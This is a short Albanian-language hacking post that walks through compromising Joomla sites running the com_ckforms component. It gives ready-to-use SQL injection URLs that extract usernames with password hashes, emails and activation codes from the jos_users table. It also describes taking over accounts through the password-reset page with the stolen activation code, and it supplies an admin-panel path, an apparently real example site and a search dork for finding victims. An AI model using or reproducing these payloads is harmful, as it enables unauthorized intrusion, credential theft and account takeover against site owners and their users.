Kjo eshte menyra per te hackuar sitet qe kan kete komponent com_ckforms joomla sites keto jan exploitat /index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,group_concat(username,0x3a,password)Bl4ck34gl3,35+from+jos_users-- nese ka gjetur passwordin dhe user name ateher ne mund te marrim me shum informacione si pshe email ,kodin e aktivizimit (activation) exp 2 /index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,group_concat(username,0x3a,email)Bl4ck34gl3,35+from+jos_users-- ne kete menyr e gjejm email ! exp 3 /index.php?option=com_user&view=reset pra me kete exploit e kerkojm ndryshimin e passwordiT ! exp 4 /index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,group_concat(username,0x3a,activation)Bl4ck34gl3,35+from+jos_users-- ketu e kemi kodin per aktivizim qkdo site e ka panelin e administratorit kshtu www.siteqekenihacku.qkadotejet/administrator psh http://www.apifex.com/administrator Dork: inurl:com_ckforms <Experti-KS> |
|
|
|